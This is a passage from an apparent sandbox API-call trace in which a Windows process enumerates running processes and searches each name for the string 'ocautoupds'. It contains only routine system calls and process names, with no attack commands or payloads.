lpSrch="ocautoupds") returned 0x0 [0094.360] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.361] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cbc0 [0094.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356cbc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.361] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.361] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.361] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.363] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c5c0 [0094.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c5c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.363] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.363] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.363] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.364] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c680 [0094.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c680, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.364] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.364] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.366] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c4e8 [0094.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c4e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.366] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.366] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.367] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c638 [0094.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.367] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.367] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.368] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c5d8 [0094.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c5d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.368] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.368] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.370] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c5f0 [0094.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c5f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.370] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.370] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.370] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.371] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c458 [0094.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c458, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.371] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.371] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.371] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.373] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c500 [0094.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x356c500, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0094.373] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0094.373] StrStrIA (lpFirst="spoolsv.exe", lpSrch="ocautoupds") returned 0x0 [0094.373] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.374] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c518 [0094.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c518, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.374] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.374] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.375] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c530 [0094.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356c530, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0094.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0094.375] StrStrIA (lpFirst="audiodg.exe", lpSrch="ocautoupds") returned 0x0 [0094.375] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0094.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.377] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c548 [0094.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356c548, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0094.377] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0094.377] StrStrIA (lpFirst="sihost.exe", lpSrch="ocautoupds") returned 0x0 [0094.377] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.379] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c6f8 [0094.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c6f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.379] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.379] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.380] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c440 [0094.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356c440, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.380] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.380] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocautoupds") returned 0x0 [0094.381] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.382] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c608 [0094.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356c608, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0094.382] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0094.382] StrStrIA (lpFirst="explorer.exe", lpSrch="ocautoupds") returned 0x0 [0094.382] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0094.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.383] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d3c8 [0094.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x356d3c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0094.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0094.383] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="ocautoupds") returned 0x0 [0094.384] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0094.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.385] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a588 [0094.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356a588, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0094.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0094.385] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="ocautoupds") returned 0x0 [0094.385] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0094.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.386] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d228 [0094.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x356d228, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0094.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0094.386] StrStrIA (lpFirst="Memory Compression", lpSrch="ocautoupds") returned 0x0 [0094.386] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0094.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0094.387] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x356d128 [0094.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x356d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0094.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0094.388] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="ocautoupds") returned 0x0 [0094.388] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0094.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.389] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c728 [0094.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356c728, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0094.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0094.389] StrStrIA (lpFirst="SearchUI.exe", lpSrch="ocautoupds") returned 0x0 [0094.389] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0094.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.390] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356d3a8 [0094.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x356d3a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0094.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0094.390] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="ocautoupds") returned 0x0 [0094.390] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.392] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c710 [0094.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356c710, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.392] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="ocautoupds") returned 0x0 [0094.392] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0094.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.394] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c6e0 [0094.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356c6e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0094.394] 